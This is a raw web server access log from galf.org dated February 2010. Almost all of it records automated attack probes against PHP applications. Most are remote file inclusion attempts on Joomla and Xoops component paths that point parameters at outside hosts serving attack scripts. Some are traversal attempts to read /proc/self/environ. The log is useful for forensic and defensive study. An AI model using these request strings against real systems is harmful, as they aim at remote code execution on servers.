61.111.3.35 - - [14/Feb/2010:18:05:15 -0800] "GET /logs/access_090921.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:18:06:47 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:18:06:55 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:18:06:56 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [14/Feb/2010:18:07:06 -0800] "GET /logs/access_091109.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
195.184.217.50 - - [14/Feb/2010:18:19:52 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.184.217.50 - - [14/Feb/2010:18:19:52 -0800] "GET /logs/access_100201.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.184.217.50 - - [14/Feb/2010:18:19:52 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:18:22:16 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:18:22:16 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:18:22:17 -0800] "GET /logs/access_100201.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:18:22:21 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:18:22:21 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:18:22:21 -0800] "GET /logs/access_100201.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.35 - - [14/Feb/2010:18:23:01 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=23&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WelcomePackage_ish; FunWebProducts)" "www.galf.org"
203.124.149.168 - - [14/Feb/2010:18:25:50 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [14/Feb/2010:18:25:50 -0800] "GET /logs/access_100125.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [14/Feb/2010:18:25:50 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:18:26:33 -0800] "GET /logs/access_091116.log/index.php?redir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:18:26:33 -0800] "GET /index.php?redir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:18:26:33 -0800] "GET /logs/index.php?redir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:18:28:26 -0800] "GET /index.php?redir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:18:28:26 -0800] "GET /logs/index.php?redir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:18:28:26 -0800] "GET /logs/access_090720.log%20%20/index.php?redir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:18:28:59 -0800] "GET /logs/access_091116.log%20%20/index.php?redir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [14/Feb/2010:18:28:59 -0800] "GET /logs/access_091228.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [14/Feb/2010:18:34:17 -0800] "GET //include/admin.lib.inc.php?site_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [14/Feb/2010:18:34:17 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [14/Feb/2010:18:34:17 -0800] "GET /logs/access_091207.log///include/admin.lib.inc.php?site_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:18:34:36 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:18:34:36 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:18:34:36 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:18:34:37 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.184.217.50 - - [14/Feb/2010:18:35:03 -0800] "GET /logs/access_091214.log//components/com_simpleboard/file_upload.php?sbp=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [14/Feb/2010:18:35:17 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [14/Feb/2010:18:35:17 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [14/Feb/2010:18:35:17 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [14/Feb/2010:18:35:19 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [14/Feb/2010:18:35:19 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [14/Feb/2010:18:35:19 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:35:30 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:35:30 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:35:30 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:35:30 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:35:48 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:35:48 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:35:48 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:35:48 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.157.114.3 - - [14/Feb/2010:18:36:03 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.157.114.3 - - [14/Feb/2010:18:36:09 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.157.114.3 - - [14/Feb/2010:18:36:13 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.184.217.50 - - [14/Feb/2010:18:36:46 -0800] "GET /logs/access_091228.log//components/com_simpleboard/file_upload.php?sbp=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [14/Feb/2010:18:36:50 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [14/Feb/2010:18:36:50 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [14/Feb/2010:18:36:50 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [14/Feb/2010:18:38:38 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [14/Feb/2010:18:38:38 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:18:39:07 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:18:39:07 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:18:40:26 -0800] "GET /logs/access_090720.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.70.247 - - [14/Feb/2010:18:41:03 -0800] "GET //include/admin.lib.inc.php?site_path=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
188.40.70.247 - - [14/Feb/2010:18:41:03 -0800] "GET /logs/access_091207.log///include/admin.lib.inc.php?site_path=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
188.40.70.247 - - [14/Feb/2010:18:41:03 -0800] "GET /logs/access_091207.log///include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
188.40.70.247 - - [14/Feb/2010:18:41:04 -0800] "GET //include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
188.40.70.247 - - [14/Feb/2010:18:41:04 -0800] "GET /logs/access_091207.log///include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
188.40.70.247 - - [14/Feb/2010:18:41:04 -0800] "GET //include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
188.40.70.247 - - [14/Feb/2010:18:41:04 -0800] "GET /errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
188.40.70.247 - - [14/Feb/2010:18:41:04 -0800] "GET /logs/access_091207.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.galf.org"
189.108.236.148 - - [14/Feb/2010:18:41:55 -0800] "GET /logs/access_091207.log%20%20///include/admin.lib.inc.php?site_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:18:42:23 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:18:42:23 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:18:42:23 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:18:43:17 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [14/Feb/2010:18:43:31 -0800] "GET /logs/access_090713.log%20%20///include/admin.lib.inc.php?site_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.184.217.50 - - [14/Feb/2010:18:47:00 -0800] "GET /logs/access_100201.log//components/com_simpleboard/file_upload.php?sbp=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:47:07 -0800] "GET /logs/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:47:07 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:47:08 -0800] "GET /?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:47:21 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:47:40 -0800] "GET /?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:47:40 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:47:41 -0800] "GET /logs/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:47:52 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:48:15 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:48:15 -0800] "GET /logs/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:48:16 -0800] "GET /?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:48:28 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [14/Feb/2010:18:48:28 -0800] "GET /logs/access_091207.log/ask_password.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [14/Feb/2010:18:48:28 -0800] "GET /ask_password.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [14/Feb/2010:18:48:28 -0800] "GET /logs/ask_password.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:48:29 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:48:29 -0800] "GET /logs/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:48:30 -0800] "GET /?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:18:48:37 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [14/Feb/2010:18:49:08 -0800] "GET /ask_password.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [14/Feb/2010:18:49:08 -0800] "GET /logs/access_091207.log/ask_password.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [14/Feb/2010:18:49:08 -0800] "GET /logs/ask_password.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:49:54 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:49:54 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:49:54 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:50:35 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:50:35 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:50:35 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.184.217.50 - - [14/Feb/2010:18:51:21 -0800] "GET /logs/access_100111.log//components/com_simpleboard/file_upload.php?sbp=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:51:37 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:18:52:11 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [14/Feb/2010:18:52:11 -0800] "GET /logs/access.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [14/Feb/2010:18:52:11 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [14/Feb/2010:18:52:11 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [14/Feb/2010:18:52:11 -0800] "GET /logs/access.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [14/Feb/2010:18:52:11 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
219.240.36.36 - - [14/Feb/2010:18:52:16 -0800] "GET /logs/access_090720.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [14/Feb/2010:18:53:23 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:53:46 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:18:53:46 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
